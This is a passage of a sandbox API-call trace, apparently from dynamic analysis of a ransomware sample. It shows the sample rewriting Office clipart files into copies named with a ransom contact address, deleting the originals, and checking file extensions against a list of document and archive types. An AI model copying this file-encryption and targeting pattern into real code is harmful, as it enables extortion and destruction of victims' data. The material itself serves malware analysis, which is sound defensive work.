(in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.656] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.656] SetEndOfFile (hFile=0x354) returned 1 [0063.656] CloseHandle (hObject=0x354) returned 1 [0063.657] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.657] SetEndOfFile (hFile=0x2c8) returned 1 [0063.658] CloseHandle (hObject=0x2c8) returned 1 [0063.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.659] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0063.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.659] lstrlenW (lpString=".doc") returned 4 [0063.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.659] lstrlenW (lpString=".docx") returned 5 [0063.659] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.659] lstrlenW (lpString=".pdf") returned 4 [0063.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.659] lstrlenW (lpString=".xls") returned 4 [0063.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.659] lstrlenW (lpString=".xlsx") returned 5 [0063.659] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.659] lstrlenW (lpString=".ppt") returned 4 [0063.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.659] lstrlenW (lpString=".zip") returned 4 [0063.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.659] lstrlenW (lpString=".rar") returned 4 [0063.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.659] lstrlenW (lpString=".bz2") returned 4 [0063.659] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.659] lstrlenW (lpString=".7z") returned 3 [0063.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.660] lstrlenW (lpString=".dbf") returned 4 [0063.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.660] lstrlenW (lpString=".1cd") returned 4 [0063.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0063.660] lstrlenW (lpString=".jpg") returned 4 [0063.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.681] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.681] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.682] GetLastError () returned 0x0 [0063.682] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1678, lpOverlapped=0x0) returned 1 [0063.751] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1680, lpOverlapped=0x0) returned 1 [0063.752] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.752] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.752] SetEndOfFile (hFile=0x354) returned 1 [0063.752] CloseHandle (hObject=0x354) returned 1 [0063.753] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.753] SetEndOfFile (hFile=0x2c8) returned 1 [0063.754] CloseHandle (hObject=0x2c8) returned 1 [0063.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0063.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.755] lstrlenW (lpString=".doc") returned 4 [0063.755] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.755] lstrlenW (lpString=".docx") returned 5 [0063.755] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.755] lstrlenW (lpString=".pdf") returned 4 [0063.755] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.755] lstrlenW (lpString=".xls") returned 4 [0063.755] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.755] lstrlenW (lpString=".xlsx") returned 5 [0063.755] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.755] lstrlenW (lpString=".ppt") returned 4 [0063.755] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.755] lstrlenW (lpString=".zip") returned 4 [0063.755] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.755] lstrlenW (lpString=".rar") returned 4 [0063.755] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.755] lstrlenW (lpString=".bz2") returned 4 [0063.755] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.755] lstrlenW (lpString=".7z") returned 3 [0063.756] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.756] lstrlenW (lpString=".dbf") returned 4 [0063.756] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.756] lstrlenW (lpString=".1cd") returned 4 [0063.756] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0063.756] lstrlenW (lpString=".jpg") returned 4 [0063.756] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.756] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.756] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.757] GetLastError () returned 0x0 [0063.757] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1044, lpOverlapped=0x0) returned 1 [0063.770] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1050, lpOverlapped=0x0) returned 1 [0063.771] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.771] WriteFile (in: hFile=0x354, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.771] SetEndOfFile (hFile=0x354) returned 1 [0063.771] CloseHandle (hObject=0x354) returned 1 [0063.771] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.772] SetEndOfFile (hFile=0x2c8) returned 1 [0063.772] CloseHandle (hObject=0x2c8) returned 1 [0063.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString=".doc") returned 4 [0063.775] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString=".docx") returned 5 [0063.775] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.775] lstrlenW (lpString=".pdf") returned 4 [0063.775] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString=".xls") returned 4 [0063.775] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.775] lstrlenW (lpString=".xlsx") returned 5 [0063.775] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.775] lstrlenW (lpString=".ppt") returned 4 [0063.775] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString=".zip") returned 4 [0063.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.775] lstrlenW (lpString=".rar") returned 4 [0063.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString=".bz2") returned 4 [0063.775] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString=".7z") returned 3 [0063.775] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString=".dbf") returned 4 [0063.775] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString=".1cd") returned 4 [0063.775] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0063.775] lstrlenW (lpString=".jpg") returned 4 [0063.775] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.780] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.780] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.781] GetLastError () returned 0x0 [0063.781] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x69aa, lpOverlapped=0x0) returned 1 [0063.843] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x69b0, lpOverlapped=0x0) returned 1 [0063.844] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.844] WriteFile (in: hFile=0x370, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.844] SetEndOfFile (hFile=0x370) returned 1 [0063.845] CloseHandle (hObject=0x370) returned 1 [0063.846] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.846] SetEndOfFile (hFile=0x354) returned 1 [0063.847] CloseHandle (hObject=0x354) returned 1 [0063.847] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0063.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.847] lstrlenW (lpString=".doc") returned 4 [0063.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.847] lstrlenW (lpString=".docx") returned 5 [0063.847] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.848] lstrlenW (lpString=".pdf") returned 4 [0063.848] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.848] lstrlenW (lpString=".xls") returned 4 [0063.848] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.848] lstrlenW (lpString=".xlsx") returned 5 [0063.848] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.848] lstrlenW (lpString=".ppt") returned 4 [0063.848] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.848] lstrlenW (lpString=".zip") returned 4 [0063.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.848] lstrlenW (lpString=".rar") returned 4 [0063.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.848] lstrlenW (lpString=".bz2") returned 4 [0063.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.848] lstrlenW (lpString=".7z") returned 3 [0063.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.848] lstrlenW (lpString=".dbf") returned 4 [0063.849] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.849] lstrlenW (lpString=".1cd") returned 4 [0063.849] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0063.849] lstrlenW (lpString=".jpg") returned 4 [0063.849] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.854] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.855] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.855] GetLastError () returned 0x0 [0063.855] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x6ba0, lpOverlapped=0x0) returned 1 [0063.978] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x6bb0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x6bb0, lpOverlapped=0x0) returned 1 [0063.979] ReadFile (in: hFile=0x2c8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.979] WriteFile (in: hFile=0x358, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.979] SetEndOfFile (hFile=0x358) returned 1 [0063.979] CloseHandle (hObject=0x358) returned 1 [0063.981] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.981] SetEndOfFile (hFile=0x2c8) returned 1 [0063.982] CloseHandle (hObject=0x2c8) returned 1 [0063.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.982] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf")) returned 1 [0063.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.982] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.982] lstrlenW (lpString=".doc") returned 4 [0063.982] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.982] lstrlenW (lpString=".docx") returned 5 [0063.982] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.982] lstrlenW (lpString=".pdf") returned 4 [0063.982] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString=".xls") returned 4 [0063.983] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.983] lstrlenW (lpString=".xlsx") returned 5 [0063.983] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.983] lstrlenW (lpString=".ppt") returned 4 [0063.983] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.983] lstrlenW (lpString=".zip") returned 4 [0063.983] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.983] lstrlenW (lpString=".rar") returned 4 [0063.983] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString=".bz2") returned 4 [0063.983] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString=".7z") returned 3 [0063.983] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.983] lstrlenW (lpString=".dbf") returned 4 [0063.983] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.983] lstrlenW (lpString=".1cd") returned 4 [0063.983] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 68 [0063.983] lstrlenW (lpString=".jpg") returned 4 [0063.983] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.024] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.024] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0064.035] GetLastError () returned 0x0 [0064.035] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x5a4, lpOverlapped=0x0) returned 1 [0064.064] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x5b0, lpOverlapped=0x0) returned 1 [0064.073] ReadFile (in: hFile=0x350, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0064.073] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0064.073] SetEndOfFile (hFile=0x344) returned 1 [0064.073] CloseHandle (hObject=0x344) returned 1 [0064.074] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0064.074] SetEndOfFile (hFile=0x350) returned 1 [0064.074] CloseHandle (hObject=0x350) returned 1 [0064.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.075] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00078_.wmf")) returned 1 [0064.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 68 [0064.075] lstrlenW (lpString=".doc") returned 4 [0064.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.075] lstrlenW (lpString=".docx") returned 5 [0064.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.075] lstrlenW (lpString=".pdf") returned 4 [0064.075] lstrcmpiW 